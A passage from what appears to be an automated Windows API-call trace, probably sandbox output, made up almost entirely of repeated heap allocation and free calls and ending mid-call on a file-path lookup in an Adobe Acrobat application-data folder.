lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0206.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0206.262] RtlAllocateHeap (HeapHandle=0x2c0000, 